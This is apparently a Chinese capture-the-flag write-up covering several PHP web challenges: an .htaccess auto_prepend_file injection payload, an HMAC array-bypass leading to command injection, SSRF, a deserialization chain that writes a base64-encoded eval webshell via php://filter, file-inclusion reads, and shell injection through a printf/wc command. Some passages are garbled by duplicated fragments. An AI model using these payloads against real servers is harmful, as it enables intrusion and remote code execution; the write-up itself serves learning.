打开就是
扫出来个index.php
然后访问
提示eval post cmd,看来是post了个cmd可以执行命令
找到bbbbbbbbb.txt文件,用base64解码得到包含flag的图片


源码
\
下面来解释一下 php_value auto_prepend_file 是用来在页面底部加载文件的 这也是为什么我们要去写入#\ 在文件底部
而#应该是.hatccess文件特有的写入形式,没有的话会直接报错500
最后那个/是用来转意换行符的
如果不用\转义则,写进去的效果是
php_value auto_prepend_fil\
e .htaccess
#\
Hello, world
不符合写入格式,进而无法解析
payload:
/?filename=.htaccess&content=php_value%20auto_prepend_fil\%0ae%20.htaccess%0a%23\
Blackcat
数组绕过
下载MP3然后文本打开,最下面藏了一段php代码
if(empty($_POST['Black-Cat-Sheriff']) || empty($_POST['One-ear'])){
die('谁!竟敢踩我一只耳的尾巴!');
}
$clandestine = getenv("clandestine");
if(isset($_POST['White-cat-monitor']))
$clandestine = hash_hmac('sha256', $_POST['White-cat-monitor'], $clandestine);
$hh = hash_hmac('sha256', $_POST['One-ear'], $clandestine);
if($hh !== $_POST['Black-Cat-Sheriff']){
die('有意瞄准,无意击发,你的梦想就是你要瞄准的目标。相信自己,你就是那颗射中靶心的子弹。');
}
echo exec("nc".$_POST['One-ear']);
1,必须传入Black-Cat-Sheriff和One-ear
2,getenv()函数定义:取得系统的环境变量; 3,用hash_hmac()和 c l a n d e s t i n e 生成新的 clandestine生成新的 clandestine生成新的clandestine ,再用新的 c l a n d e s t i n e 生成 clandestine生成 clandestine生成hh
我们要控制Black-Cat-Sheriff来与 h h 相等,就要通过传入 W h i t e − c a t − m o n i t o r 和 O n e − e a r 预测 hh相等,就要通过传入White-cat-monitor和One-ear预测 hh相等,就要通过传入White−cat−monitor和One−ear预测hh的值
看hash_hmac()
hash_hmac — 使用 HMAC 方法生成带有密钥的哈希值
string hash_hmac ( string $algo , string $data , string $key [, bool $raw_output = false ] )
参数
algo
要使用的哈希算法名称,例如:"md5","sha256","haval160,4" 等。 如何获取受支持的算法清单,请参见 hash_algos() 。
data
要进行哈希运算的消息。
key
使用 HMAC 生成信息摘要时所使用的密钥。
raw_output
设置为 TRUE 输出原始二进制数据, 设置为 FALSE 输出小写 16 进制字符串
当传入的$data
为数组时,加密得到的结果固定为NULL
;那么第二次的hash_hmac就是可控的.
利用这个点,生成密钥为NULL,那么第二次的哈希值$hh我们就能运行出来
很奇怪ls没列出flag的文件名,直接cat就行了
SSRF LFI 反序列化 死亡exit
robots.txt
star1.php
不安全的协议http,要利用 SSRF 才能访问到 ser.php
/star1.php?path=http://127.0.0.1/ser.php
得到源码
';
$a= $d. $this->text;
@file_put_contents($this-> file,$a);
}
}
class Yasuo{
public function hasaki(){
return "I'm the best happy windy man";
}
}
?>
没有反序列化入口
新知识,还可以扫描http的参数
pip3 install arjun
arjun -u URL

我这里扫不出来,日了
看别人wp 扫出来c参数
直接构造链子吧,目的肯定是通过file_put_contents( t h i s − > f i l e , this-> file, this−>file,a);写入马执行命令
逻辑简单,通过__toString()调用hasaki(),如何调用toString其实就是c参数传参,echo触发
附上c参数的逻辑
$c=$_GET['c'];
if(isset($c)){
echo $x = unserialize($c); //echo 的时候会触发 __toString() 魔术方法
}
else{
echo "your hat is too black!";
}
利用php伪协议绕过死亡die() ,构造pop如下
的base64编码*/
}
$a = new GWHT();
$a->hero=new Yongen();
echo serialize($a);

利用php伪协议绕过死亡die() ,用php伪协议以写入base64数据然后自动解码,前面的死亡die()就被忽略了
那么aaa.php得到PD9waHAgQGV2YWwoJF9QT1NUWzFdKTs=
Easyphp2LFI 短标签
http://1.14.71.254:28101/?file=GWHT.php
这个url看起来就像是文件包含伪协议读文件

是有过滤,看wp把base64两次url编码后,就能读到了
还有个协议也可以?file=php://filter/convert.quoted-printable-encode/resource=GWHT.php
得到源码
然后第一段意思就是cookie不能为PASS,根据首页提示要等于GWHT
这个框就是count传参的地,效果是counter也就是计数器,返回字符串长度
利用exec('printf \'' . $count . '\' | wc -c')
来getshell
去掉转义符就是 printf ' . $count . ' | wc -c
wc命令
wc -c或–bytes或–chars 只显示Bytes数,这就实现了计数器的功能
我们目前是想要执行命令并不想让他计数,考虑注释掉,但是#被过滤
这个时候可以考虑||管道符,只执行前面命令,|管道符是正确执行前面命令然后执行后面命令
printf ''| ls || '' | wc -c 管道符|结束printf''的命令 接着执行ls
测试如果输入 aaa'||'就行成 printf'aaa' || ' ' | wc -c 就输出aaa
顺利执行命令
写shell进去也是一样的道理,
最近更新
- 深拷贝和浅拷贝的区别(重点)
- 【Vue】走进Vue框架世界
- 【云服务器】项目部署—搭建网站—vue电商后台管理系统
- 【React介绍】 一文带你深入React
- 【React】React组件实例的三大属性之state,props,refs(你学废了吗)
- 【脚手架VueCLI】从零开始,创建一个VUE项目
- 【React】深入理解React组件生命周期----图文详解(含代码)
- 【React】DOM的Diffing算法是什么?以及DOM中key的作用----经典面试题
- 【React】1_使用React脚手架创建项目步骤--------详解(含项目结构说明)
- 【React】2_如何使用react脚手架写一个简单的页面?